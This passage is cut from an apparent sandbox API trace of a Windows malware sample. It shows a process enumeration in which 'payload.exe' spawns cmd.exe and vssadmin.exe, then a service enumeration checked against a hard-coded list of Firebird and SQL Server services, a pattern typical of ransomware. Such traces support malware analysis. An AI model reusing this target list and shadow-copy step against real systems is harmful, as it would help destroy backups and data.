hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0033.915] lstrlenW (lpString="services.exe") returned 12 [0033.915] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0033.915] lstrlenW (lpString="lsass.exe") returned 9 [0033.915] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0033.916] lstrlenW (lpString="lsm.exe") returned 7 [0033.916] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.917] lstrlenW (lpString="svchost.exe") returned 11 [0033.917] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.917] lstrlenW (lpString="svchost.exe") returned 11 [0033.917] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.918] lstrlenW (lpString="svchost.exe") returned 11 [0033.918] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.919] lstrlenW (lpString="svchost.exe") returned 11 [0033.919] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.919] lstrlenW (lpString="svchost.exe") returned 11 [0033.919] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0033.920] lstrlenW (lpString="audiodg.exe") returned 11 [0033.920] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.921] lstrlenW (lpString="svchost.exe") returned 11 [0033.921] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.921] lstrlenW (lpString="svchost.exe") returned 11 [0033.921] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0033.922] lstrlenW (lpString="dwm.exe") returned 7 [0033.922] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0033.922] lstrlenW (lpString="explorer.exe") returned 12 [0033.922] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0033.923] lstrlenW (lpString="spoolsv.exe") returned 11 [0033.923] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0033.924] lstrlenW (lpString="taskhost.exe") returned 12 [0033.924] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.924] lstrlenW (lpString="svchost.exe") returned 11 [0033.924] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0033.925] lstrlenW (lpString="taskeng.exe") returned 11 [0033.925] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0033.926] lstrlenW (lpString="taskhost.exe") returned 12 [0033.926] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0033.926] lstrlenW (lpString="carried trinity.exe") returned 19 [0033.926] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0033.927] lstrlenW (lpString="heaven.exe") returned 10 [0033.927] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0033.928] lstrlenW (lpString="dell.exe") returned 8 [0033.928] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0033.928] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0033.928] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0033.929] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0033.929] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0033.987] lstrlenW (lpString="til ear equal.exe") returned 17 [0033.987] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0033.988] lstrlenW (lpString="itunes-bring.exe") returned 16 [0033.988] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0033.988] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0033.988] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0033.989] lstrlenW (lpString="philadelphia.exe") returned 16 [0033.989] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0033.989] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0033.990] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0033.990] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0033.990] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0033.991] lstrlenW (lpString="fraud stuck.exe") returned 15 [0033.991] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0033.992] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0033.992] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0033.992] lstrlenW (lpString="attended.exe") returned 12 [0033.992] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0033.993] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0033.993] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0033.994] lstrlenW (lpString="pan physician.exe") returned 17 [0033.994] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0033.994] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0033.994] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0033.995] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0033.995] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0033.995] lstrlenW (lpString="over-celebrity.exe") returned 18 [0033.996] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0033.996] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0033.996] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0033.997] lstrlenW (lpString="dllhost.exe") returned 11 [0033.997] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0033.997] lstrlenW (lpString="dllhost.exe") returned 11 [0033.997] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0033.998] lstrlenW (lpString="payload.exe") returned 11 [0033.998] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0033.999] lstrlenW (lpString="cmd.exe") returned 7 [0033.999] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0033.999] lstrlenW (lpString="conhost.exe") returned 11 [0033.999] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0034.000] lstrlenW (lpString="vssadmin.exe") returned 12 [0034.000] Process32NextW (in: hSnapshot=0x164, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0034.001] CloseHandle (hObject=0x164) returned 1 [0034.001] Sleep (dwMilliseconds=0x1f4) [0034.651] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626910 [0034.652] EnumServicesStatusExW (in: hSCManager=0x626910, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0034.652] GetLastError () returned 0xea [0034.652] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x123e) returned 0x3857378 [0034.652] EnumServicesStatusExW (in: hSCManager=0x626910, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3857378, cbBufSize=0x123e, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3857378, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0034.653] CloseServiceHandle (hSCObject=0x626910) returned 1 [0034.653] lstrlenW (lpString="Appinfo") returned 7 [0034.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0034.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0034.653] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0034.653] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0034.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0034.653] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0034.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0034.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0034.653] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0034.653] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0034.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0034.653] lstrlenW (lpString="AudioSrv") returned 8 [0034.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0034.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0034.654] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0034.654] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0034.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0034.654] lstrlenW (lpString="BFE") returned 3 [0034.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0034.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0034.654] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0034.654] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0034.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0034.654] lstrlenW (lpString="CryptSvc") returned 8 [0034.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0034.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0034.654] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0034.654] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0034.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0034.654] lstrlenW (lpString="CscService") returned 10 [0034.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0034.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0034.654] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0034.654] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0034.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0034.654] lstrlenW (lpString="DcomLaunch") returned 10 [0034.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0034.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0034.654] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0034.654] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0034.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0034.654] lstrlenW (lpString="Dhcp") returned 4 [0034.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0034.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0034.654] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0034.655] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0034.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0034.655] lstrlenW (lpString="Dnscache") returned 8 [0034.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0034.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0034.655] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0034.655] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0034.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0034.655] lstrlenW (lpString="DPS") returned 3 [0034.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0034.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0034.655] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0034.655] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0034.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0034.655] lstrlenW (lpString="eventlog") returned 8 [0034.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0034.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0034.655] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0034.655] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0034.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0034.655] lstrlenW (lpString="EventSystem") returned 11 [0034.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0034.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0034.655] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0034.655] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0034.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0034.655] lstrlenW (lpString="gpsvc") returned 5 [0034.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0034.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0034.655] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0034.655] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0034.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0034.655] lstrlenW (lpString="iphlpsvc") returned 8 [0034.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0034.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0034.656] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0034.656] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0034.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0034.656] lstrlenW (lpString="LanmanServer") returned 12 [0034.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0034.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0034.656] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0034.656] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0034.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0034.656] lstrlenW (lpString="LanmanWorkstation") returned 17 [0034.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0034.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0034.656] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0034.656] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0034.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0034.656] lstrlenW (lpString="lmhosts") returned 7 [0034.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0034.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0034.656] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0034.656] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0034.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0034.656] lstrlenW (lpString="MMCSS") returned 5 [0034.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0034.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0034.656] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0034.656] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0034.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0034.656] lstrlenW (lpString="MpsSvc") returned 6 [0034.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0034.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0034.656] lstrcmpiW 